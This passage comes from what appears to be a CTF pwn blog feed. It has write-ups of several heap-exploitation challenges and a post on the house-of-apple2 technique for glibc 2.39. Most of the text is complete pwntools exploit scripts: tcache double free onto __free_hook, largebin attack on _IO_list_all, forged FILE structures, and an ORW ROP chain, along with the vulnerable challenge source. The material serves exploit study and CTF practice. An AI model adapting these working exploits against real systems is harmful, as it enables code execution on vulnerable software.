alt="image-20240727205753254"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407272059580.png" alt="image-20240727205947516"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407272100307.png" alt="image-20240727210002258"></p><h2 id="break-1"><a href="#break-1" class="headerlink" title="break"></a>break</h2><p>We were slow on this one because the JSON request format kept tripping us up; we only got it right at the very end.</p><p>There is a heap overflow and a UAF, so the exploit goes straight for <code>__free_hook</code>: leak libc from an unsorted-bin chunk, use a tcache double free to get an allocation on top of <code>__free_hook</code>, write <code>system</code> there, and free a chunk containing <code>/bin/sh</code>.</p><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">from pwn import *<br>from ctypes import *<br>from struct import pack<br>banary = "./pwn"<br>elf = ELF(banary)<br>#libc = ELF("./libc.so.6")<br>libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")<br>ip = ''<br>port = 0<br>local = 1<br>if local:<br>    io = process(banary)<br>else:<br>    io = remote(ip, port)<br><br>context(log_level = 'debug', os = 'linux', arch = 'amd64')<br><br>def dbg():<br>    gdb.attach(io)<br>    pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))<br>uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b'\x00'))<br>lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br># every request is one JSON object: {"choice": ..., "index": ..., "length": ..., "message": ...}<br>def add(index,lenth=0x400,content=b'youlin'):<br>    ru("Please input:")<br>    json=b'{"choice":"new","index":'+str(index).encode()+b',"length":'+str(lenth).encode()+b',"message":"'+content+b'"}'<br>    sl(json)<br><br>def delete(index,lenth=0x400,content=b'youlin'):<br>    ru("Please input:")<br>    json=b'{"choice":"rm","index":'+str(index).encode()+b',"length":'+str(lenth).encode()+b',"message":"'+content+b'"}'<br>    sl(json)<br><br>def show(index,lenth=0x400,content=b'youlin'):<br>    ru("Please input:")<br>    json=b'{"choice":"view","index":'+str(index).encode()+b',"length":'+str(lenth).encode()+b',"message":"'+content+b'"}'<br>    sl(json)<br><br>def edit(index,content=b'youlin'):<br>    ru("Please input:")<br>    json=b'{"choice":"modify","index":'+str(index).encode()+b',"length":'+str(len(content)).encode()+b',"message":"'+content+b'"}'<br>    sl(json)<br><br>add(0)<br>add(1)<br>add(2,0x100)<br># heap overflow: modify writes past chunk 0 and rewrites a size field with<br># 0x771 (offset found in gdb), so the chunk freed next is too big for tcache<br># and lands in the unsorted bin<br>edit(0,b'A'*0x650+b'B'*8+b'\x71\x07')<br><br>delete(1)<br># chunk 3 is carved from the unsorted chunk and still holds the stale fd<br># pointer into main_arena; one byte is written so view() prints it, and the<br># 'A' (0x41) that replaces the low byte is accounted for in the 0x1ecb41 offset<br>add(3,0x78,b'')<br>edit(3,b'A')<br><br>show(3)<br>libcbase=uu64()-0x1ecb41<br>lg("libcbase")<br>free_hook=libcbase+libc.sym['__free_hook']<br>system=libcbase+libc.sym['system']<br><br># UAF: modify still works on a freed chunk. Overwrite the tcache key so the<br># second free passes the double-free check, then point fd at __free_hook<br>delete(3)<br>edit(3,b'A'*0x10)<br>delete(3)<br>edit(3,p64(free_hook)[:6])<br>add(4,0x78,b'/bin/sh')<br>add(5,0x78,p64(system)[:6])    # this allocation lands on __free_hook<br><br>delete(4)    # free("/bin/sh") now calls system("/bin/sh")<br><br>ia()<br></code></pre></td></tr></table></figure><h1 id="chr"><a href="#chr" class="headerlink" title="chr"></a>chr</h1><h2 id="fix-2"><a href="#fix-2" class="headerlink" title="fix"></a>fix</h2><p>A fairly standard menu challenge with one extra option, convert. The other options have no bugs, so convert is naturally where to look.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407272104795.png" alt="image-20240727210427717"></p><p>With no network access we could not tell exactly what the function did, but it was a fair guess that the memcpy below it could overflow the heap; reducing n to a smaller number was enough to pass the check.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407272105915.png" alt="image-20240727210553864"></p><h2 
id="break-2"><a href="#break-2" class="headerlink" title="break"></a>break</h2><p>After the contest I looked up what this function does: it is a Chinese character conversion, and it can cause a heap overflow.</p><p>The rest of the attack is fairly standard: modify a size to overlap other chunks, leak libc and overwrite _IO_list_all with a heap address, then trigger the apple2 chain.</p><figure class="highlight routeros"><table><tr><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./pwn"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-attribute">libc</span>=ELF("/lib/x86_64-linux-gnu/libc.so.6")<span 
class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">''</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>def cmd(choice):<br> ru(<span class="hljs-string">"choice >> "</span>)<br> sl(str(choice))<br><br>def <span class="hljs-built_in">add</span>(size,<span class="hljs-attribute">content</span>=b'youlin'):<br> cmd(1)<br> ru(<span class="hljs-string">"size:"</span>)<br> sl(str(size))<br> ru(<span class="hljs-string">"content:"</span>)<br> s(content)<br><br>def delete(index):<br> cmd(2)<br> ru(<span class="hljs-string">"idx:"</span>)<br> sl(str(index))<br><br>def <span 
class="hljs-built_in">edit</span>(index,content):<br> cmd(3)<br> ru(<span class="hljs-string">"idx:"</span>)<br> sl(str(index))<br> ru(<span class="hljs-string">"content:"</span>)<br> s(content)<br><br>def show(index):<br> cmd(4)<br> ru(<span class="hljs-string">"idx:"</span>)<br> sl(str(index))<br><br>def convert(index):<br> cmd(5)<br> ru(<span class="hljs-string">"idx:"</span>)<br> sl(str(index))<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(0x8):<br> <span class="hljs-built_in">add</span>(0x108)<br><span class="hljs-comment">#0-7</span><br><br><span class="hljs-built_in">edit</span>(0,b<span class="hljs-string">'A'</span><span class="hljs-number">*0</span>x100+<span class="hljs-string">'坤'</span>.encode(<span class="hljs-string">'UTF-8'</span>)+b<span class="hljs-string">'\x51\x05'</span>)<br>convert(0)<br><br>delete(1)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(6):<br> <span class="hljs-built_in">add</span>(0x210)<br><span class="hljs-comment">#8-12</span><br><br>show(3)<br>ru(<span class="hljs-string">"content:"</span>)<br><span class="hljs-attribute">libcbase</span>=u64(io.recv(6).ljust(8,b'\x00'))-0x203b20<br>lg(<span class="hljs-string">"libcbase"</span>)<br>one=[0x50a47,0xebc81,0xebc85,0xebc88,0xebce2,0xebd3f,0xebd43]<br><span class="hljs-attribute">onegadget</span>=libcbase+one[1]<br><span class="hljs-attribute">l_next</span>=libcbase+0x3fe890<br><span class="hljs-attribute">rtld_global</span>=libcbase+0x3fd040<br><span class="hljs-attribute">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><span class="hljs-attribute">bin_sh</span>=libcbase+next(libc.search(b'/bin/sh\x00'))<br><span class="hljs-attribute">setcontext</span>=libcbase+libc.sym[<span class="hljs-string">'setcontext'</span>]+61<br>_IO_list_all = libcbase + 0x2044c0<br><span class="hljs-attribute">ret</span>=libcbase+0x000000000002882f<br><span 
class="hljs-attribute">pop_rdi</span>=libcbase+0x000000000010f75b<br><span class="hljs-attribute">leave_ret</span>=libcbase+0x00000000000299d2<br><span class="hljs-attribute">swapcontext</span>=libcbase+0x000000000005814D<br><span class="hljs-attribute">svcudp_reply</span>=libcbase+0x000000000017923D<br>one=[0x583dc,0x583e3,0xef4ce,0xef52b]<br><span class="hljs-attribute">one_gadget</span>=libcbase+one[3]<br><span class="hljs-attribute">open</span>=libcbase+libc.sym[<span class="hljs-string">'open'</span>]<br><span class="hljs-attribute">read</span>=libcbase+libc.sym[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">write</span>=libcbase+libc.sym[<span class="hljs-string">'write'</span>]<br><span class="hljs-attribute">pop_rsi</span>=libcbase+0x0000000000110a4d<br><span class="hljs-attribute">syscall_ret</span>=libcbase+0x0000000000098fa6<br><span class="hljs-attribute">pop_rdx</span>=libcbase+0x00000000001a1034#pop rdx; <span class="hljs-built_in">add</span> rdi, rsi; xor eax, eax; cmp rdx, rsi; cmova rax, rdi; ret;<br><span class="hljs-attribute">pop_rax</span>=libcbase+0x00000000000dd237<br><br><span class="hljs-built_in">add</span>(0x108)#13<br><span class="hljs-built_in">add</span>(0x108)#14<br>delete(13)<br>delete(14)<br><br>show(3)<br>ru(<span class="hljs-string">"content:"</span>)<br><span class="hljs-attribute">key</span>=u64(io.recvuntil(b'\n')[:-1].ljust(8,b<span class="hljs-string">'\0'</span>))-1<br><span class="hljs-attribute">heapbase</span>=key<<12<br><span class="hljs-attribute">heapbase</span>=heapbase-0x6000<br>lg(<span class="hljs-string">"heapbase"</span>)<br><br><span class="hljs-built_in">edit</span>(4,p64(_IO_list_all^(key+1)))<br><span class="hljs-built_in">add</span>(0x108)#15<br><span class="hljs-built_in">add</span>(0x108,p64(heapbase+0x75e0-0x10))#16<br><br><span class="hljs-attribute">fake_heap</span>=heapbase+0x2a10<br><span class="hljs-attribute">heap1</span>=fake_heap+0x88<br>IO_wfile_jumps = libcbase + 
0x202228#_IO_wfile_jumps<br><span class="hljs-built_in">add</span>(0x410)#17<br>lg(<span class="hljs-string">"fake_heap"</span>)<br>lg(<span class="hljs-string">"heap1"</span>)<br><br>fake_file = b<span class="hljs-string">''</span><br>fake_file = p64(0)+p64(1)<br>fake_file= fake_file.ljust(0x28,b<span class="hljs-string">'\x00'</span>)+p64(heap1)<br>fake_file = fake_file.ljust(0x68,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>fake_file = fake_file.ljust(0x80,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>fake_file = fake_file.ljust(0xb8,b<span class="hljs-string">'\x00'</span>)+p64(IO_wfile_jumps)<br>payload = cyclic(0x10)+fake_file<br><span class="hljs-built_in">edit</span>(0,payload)<br><br><span class="hljs-attribute">flag_addr</span>=heapbase+0x2d10<br><span class="hljs-attribute">orw</span>=p64(pop_rax)+p64(2)+p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(syscall_ret)<br>orw+=p64(pop_rdx)+p64(0x50)+p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(fake_heap+0x300)+p64(pop_rax)+p64(0)+p64(syscall_ret)<br>orw+=p64(pop_rdx)+p64(0x50)+p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(fake_heap+0x300)+p64(pop_rax)+p64(1)+p64(syscall_ret)<br><br>payload = b<span class="hljs-string">''</span><br>payload = payload.ljust(0x58,b<span class="hljs-string">'\x00'</span>)+p64(svcudp_reply)<br>payload = payload.ljust(0xa0,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap+0x120-0x28)+p64(ret)<br>payload = payload.ljust(0xc0,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)+p64(0)<span class="hljs-number">*3</span>+p64(fake_heap-0x10)+p64(0)<br>payload +=b<span class="hljs-string">'\x00'</span><span class="hljs-number">*0</span>x28+p64(fake_heap)<br>payload +=p64(swapcontext)<br>payload = payload.ljust(0x128,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap+0x130)+p64(ret)+orw<br>payload = payload.ljust(0x168,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>payload = payload.ljust(0x300,b<span class="hljs-string">'\x00'</span>)+b<span 
class="hljs-string">'flag\x00'</span><br><span class="hljs-built_in">edit</span>(15,payload)<br><br><br>cmd(6)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>GLIBC 2.39 exploitation based on house-of-apple2</title>
<link href="/2024/05/30/house-of-apple2-GLIBC2-39/"/>
<url>/2024/05/30/house-of-apple2-GLIBC2-39/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h1><p>Ubuntu has moved to 24, so I felt it was time to look at exploitation on the latest glibc, in case a challenge author sets a 2.39 problem.</p><p>Thanks to REtard for the two key suggestions on the exploitation.</p><h1 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>Preconditions</h1><p>A leak of the libc address and the heap address</p><p>One arbitrary-address write (usually a largebin attack)</p><p>The ability to trigger the IO stream operations</p><h1 id="house-of-apple2利用链"><a href="#house-of-apple2利用链" class="headerlink" title="house of apple2利用链"></a>house of apple2 exploitation chain</h1><p>The way it is triggered is no different from 2.35: calling exit directly, returning from main to exit, or having malloc_assert print its error message all work.</p><p>Chain triggered by exit</p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk"><span class="hljs-keyword">exit</span>->fcloseall->_IO_cleanup->_IO_flush_all->_IO_wfile_overflow->_IO_wdoallocbuf<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405301628288.png" alt="image-20240530162844058"></p><p>The method is to hijack _IO_list_all to a heap address and forge the IO structure there.</p><p>There is not much to say about the apple2 forgery itself; it is not much different from 2.35. Just debug it, look at the few check points, and adjust a little.</p><h1 id="后续利用"><a href="#后续利用" class="headerlink" title="后续利用"></a>Follow-up exploitation</h1><p>In apple2 on 2.35 the rdx register could be controlled directly to reach setcontext, so a ROP chain or ORW could be written comfortably. On 2.39, however, the apple2 chain cannot control rdx, so the choice here is</p><figure class="highlight ebnf"><table><tr><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">svcudp_reply</span><br><span class="hljs-attribute">swapcontext</span><br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405301636385.png" alt="image-20240530163629351"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405301635351.png" alt="image-20240530163512303"></p><p>First use svcudp_reply to control the r12 register, then use swapcontext to control rsp, and finally ret; the program then executes our ROP or ORW.</p><h1 id="例题"><a href="#例题" class="headerlink" title="例题"></a>Example challenge</h1><p>Source:</p><figure 
class="highlight arduino"><table><tr><td class="code"><pre><code class="hljs arduino"><span class="hljs-comment">//gcc heap.c -o heap</span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><br><span class="hljs-type">void</span> * ptr[<span class="hljs-number">0x10</span>] = {<span class="hljs-number">0</span>};<br><span class="hljs-type">int</span> ptr_size[<span class="hljs-number">0x10</span>] = {<span class="hljs-number">0</span>};<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">init</span><span class="hljs-params">()</span></span>{<br> <span class="hljs-built_in">setbuf</span>(stdin, <span class="hljs-number">0</span>);<br> <span class="hljs-built_in">setbuf</span>(stdout, <span class="hljs-number">0</span>);<br> <span class="hljs-built_in">setbuf</span>(stderr, <span class="hljs-number">0</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"LitCTF2024 heap 2.35"</span>);<br>}<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">menu</span><span class="hljs-params">()</span></span>{<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"1. create"</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"2. delete"</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"3. show"</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"4. edit"</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"5. 
exit"</span>);<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">">>"</span>);<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">create</span><span class="hljs-params">()</span></span>{<br><span class="hljs-type">int</span> idx = <span class="hljs-number">0</span>, size = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"idx? "</span>);<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &idx);<br><span class="hljs-keyword">if</span>(idx < <span class="hljs-number">0</span> || idx >= <span class="hljs-number">0x10</span> || ptr[idx]){<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"error !"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"size? "</span>);<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &size);<br><span class="hljs-keyword">if</span>(size<<span class="hljs-number">0x410</span> || size ><span class="hljs-number">0x1000</span>)<br>{<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"error !"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br>ptr[idx] = <span class="hljs-built_in">malloc</span>(size);<br><span class="hljs-keyword">if</span>(!ptr[idx]){<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"malloc error!"</span>);<br><span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>);<br>}<br>ptr_size[idx] = size;<br>}<br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">delete</span><span class="hljs-params">()</span></span>{<br><span class="hljs-type">int</span> idx = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"idx? 
"</span>);<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &idx);<br><br><span class="hljs-keyword">if</span>(idx < <span class="hljs-number">0</span> || idx >= <span class="hljs-number">0x10</span> || !ptr[idx]){<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"no such chunk!"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-built_in">free</span>(ptr[idx]);<br>}<br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">show</span><span class="hljs-params">()</span></span>{<br><span class="hljs-type">int</span> idx = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"idx? "</span>);<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &idx);<br><br><span class="hljs-keyword">if</span>(idx < <span class="hljs-number">0</span> || idx >= <span class="hljs-number">0x10</span> || !ptr[idx]){<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"no such chunk!"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"content : %s\n"</span>, (<span class="hljs-type">char</span> *)ptr[idx]);<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">edit</span><span class="hljs-params">()</span></span>{<br><span class="hljs-type">int</span> idx = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"idx? 
"</span>);<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &idx);<br><br><span class="hljs-keyword">if</span>(idx < <span class="hljs-number">0</span> || idx >= <span class="hljs-number">0x10</span> || !ptr[idx]){<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"no such chunk!"</span>);<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"content : "</span>);<br><span class="hljs-built_in">read</span>(<span class="hljs-number">0</span>, (<span class="hljs-type">char</span> *)ptr[idx], ptr_size[idx]);<br>}<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">Exit</span><span class="hljs-params">()</span></span>{<br><span class="hljs-keyword">for</span>(<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i < <span class="hljs-number">0x10</span>; i++){<br><span class="hljs-keyword">if</span>(!ptr[i]){<br><span class="hljs-built_in">free</span>(ptr[i]);<br>ptr[i] = <span class="hljs-number">0</span>;<br>ptr_size[i] = <span class="hljs-number">0</span>;<br>}<br>}<br><span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span>{<br> <span class="hljs-built_in">init</span>();<br><span class="hljs-type">int</span> idx = <span class="hljs-number">0</span>;<br><span class="hljs-keyword">while</span>(<span class="hljs-number">1</span>){<br><span class="hljs-built_in">menu</span>();<br><span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%d"</span>, &idx);<br><span class="hljs-keyword">switch</span>(idx){<br><span class="hljs-keyword">case</span> <span class="hljs-number">1</span>:<br><span class="hljs-built_in">create</span>();<br><span 
class="hljs-keyword">break</span>;<br><span class="hljs-keyword">case</span> <span class="hljs-number">2</span>:<br><span class="hljs-built_in">delete</span>();<br><span class="hljs-keyword">break</span>;<br><span class="hljs-keyword">case</span> <span class="hljs-number">3</span>:<br><span class="hljs-built_in">show</span>();<br><span class="hljs-keyword">break</span>;<br><span class="hljs-keyword">case</span> <span class="hljs-number">4</span>:<br><span class="hljs-built_in">edit</span>();<br><span class="hljs-keyword">break</span>;<br><span class="hljs-keyword">case</span> <span class="hljs-number">5</span>:<br><span class="hljs-built_in">Exit</span>();<br><span class="hljs-keyword">break</span>;<br><span class="hljs-keyword">default</span>:<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">"error!"</span>);<br><span class="hljs-keyword">break</span>;<br>}<br>}<br><br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><p>The challenge is a simple heap challenge with just one UAF vulnerability, and only chunks between 0x410 and 0x1000 in size can be requested.</p><p>A single largebin attack that writes a heap address into _IO_list_all is enough to complete the exploit.</p><p>exp:</p><figure class="highlight routeros"><table><tr><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./heap"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-attribute">libc</span>=ELF("/lib/x86_64-linux-gnu/libc.so.6")<span 
class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">'192.168.182.137'</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 10006<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>def cmd(choice):<br> ru(<span class="hljs-string">">>"</span>)<br> sl(str(choice))<br><br>def <span class="hljs-built_in">add</span>(index,size):<br> cmd(1)<br> ru(<span class="hljs-string">"idx? "</span>)<br> sl(str(index))<br> ru(<span class="hljs-string">"size? "</span>)<br> sl(str(size))<br><br>def delete(index):<br> cmd(2)<br> ru(<span class="hljs-string">"idx? "</span>)<br> sl(str(index))<br><br>def show(index):<br> cmd(3)<br> ru(<span class="hljs-string">"idx? 
"</span>)<br> sl(str(index))<br><br>def <span class="hljs-built_in">edit</span>(index,content):<br> cmd(4) <br> ru(<span class="hljs-string">"idx? "</span>)<br> sl(str(index))<br> ru(<span class="hljs-string">"content : "</span>)<br> s(content)<br><br><span class="hljs-built_in">add</span>(0,0x420)<br><span class="hljs-built_in">add</span>(1,0x18)<br><span class="hljs-built_in">add</span>(2,0x418)<br><br>delete(0)<br><span class="hljs-built_in">add</span>(3,0x460)<br>delete(2)<br><br>show(0)<br><span class="hljs-attribute">fd</span>=uu64()<br><span class="hljs-attribute">libcbase</span>=fd-0x203f10<br>lg(<span class="hljs-string">"fd"</span>)<br>lg(<span class="hljs-string">"libcbase"</span>)<br><br>one=[0x50a47,0xebc81,0xebc85,0xebc88,0xebce2,0xebd3f,0xebd43]<br><span class="hljs-attribute">onegadget</span>=libcbase+one[1]<br><span class="hljs-attribute">l_next</span>=libcbase+0x3fe890<br><span class="hljs-attribute">rtld_global</span>=libcbase+0x3fd040<br><span class="hljs-attribute">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><span class="hljs-attribute">bin_sh</span>=libcbase+next(libc.search(b'/bin/sh\x00'))<br><span class="hljs-attribute">setcontext</span>=libcbase+libc.sym[<span class="hljs-string">'setcontext'</span>]+61<br>_IO_list_all = libcbase + libc.sym[<span class="hljs-string">'_IO_list_all'</span>]<br><span class="hljs-attribute">ret</span>=libcbase+0x000000000002882f<br><span class="hljs-attribute">pop_rdi</span>=libcbase+0x000000000010f75b<br><span class="hljs-attribute">leave_ret</span>=libcbase+0x00000000000299d2<br><span class="hljs-attribute">swapcontext</span>=libcbase+0x000000000005814D<br><span class="hljs-attribute">svcudp_reply</span>=libcbase+0x000000000017923D<br>one=[0x583dc,0x583e3,0xef4ce,0xef52b]<br><span class="hljs-attribute">one_gadget</span>=libcbase+one[3]<br>lg(<span class="hljs-string">"l_next"</span>)<br>lg(<span class="hljs-string">"rtld_global"</span>)<br><br><span 
class="hljs-built_in">edit</span>(0,b<span class="hljs-string">'A'</span><span class="hljs-number">*0</span>x10)<br>show(0)<br>ru(b<span class="hljs-string">'A'</span><span class="hljs-number">*0</span>x10)<br><span class="hljs-attribute">heapbase</span>=uheap()-0x290<br>lg(<span class="hljs-string">"heapbase"</span>)<br><span class="hljs-built_in">edit</span>(0,p64(fd)<span class="hljs-number">*2</span>+p64(heapbase+0x290)+p64(_IO_list_all-0x20))<br><br><span class="hljs-built_in">add</span>(4,0x490)<br><br><span class="hljs-attribute">fake_heap</span>=heapbase+0xb00+0x10<br><span class="hljs-attribute">heap1</span>=fake_heap+0x88<br>IO_wfile_jumps = libcbase + 0x202228#_IO_wfile_jumps<br><br>lg(<span class="hljs-string">"fake_heap"</span>)<br>lg(<span class="hljs-string">"heap1"</span>)<br>fake_file = b<span class="hljs-string">''</span><br>fake_file = p64(0)+p64(1)<br>fake_file= fake_file.ljust(0x28,b<span class="hljs-string">'\x00'</span>)+p64(heap1)<br>fake_file = fake_file.ljust(0x68,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>fake_file = fake_file.ljust(0x80,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>fake_file = fake_file.ljust(0xb8,b<span class="hljs-string">'\x00'</span>)+p64(IO_wfile_jumps)<br>payload = cyclic(0x10)+fake_file<br><span class="hljs-built_in">edit</span>(2,payload)<br><br>payload = b<span class="hljs-string">''</span><br>payload = payload.ljust(0x58,b<span class="hljs-string">'\x00'</span>)+p64(svcudp_reply)<br>payload = payload.ljust(0xa0,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap+0x120-0x28)+p64(ret)<br>payload = payload.ljust(0xc0,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)+p64(0)<span 